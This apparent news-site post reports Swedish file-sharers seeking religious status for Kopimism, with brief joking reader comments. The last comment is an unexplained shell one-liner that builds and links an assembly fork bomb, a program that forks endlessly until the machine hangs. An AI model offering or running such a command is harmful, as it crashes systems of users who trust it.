Swedish File-Sharers File For Religious Status
nloop writes "A group of file-sharers in Sweden have requested that their religion, Kopimism, be officially recognized in Sweden. Although this status has been denied once in the past the struggle for religious freedom from persecution continues. Aside from deeming CTRL+C CTRL+V as sacred symbols other beliefs include the flow of information being ethically right and closed source software being 'akin to slavery.'"
All who follow the mighty Jobs know that the only proper religious symbols are cmd-c, cmd-v
Makes more sense than scientology ;)
So not only can the pirates watch movies for free, but they also reduce the chances a multi-billion dollars CGI piece of crap will be released in the future ? Sounds like a win-win to me.
Unfortunately, ms is a religion that's yet to produce a saint.
Dave Cutler?
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;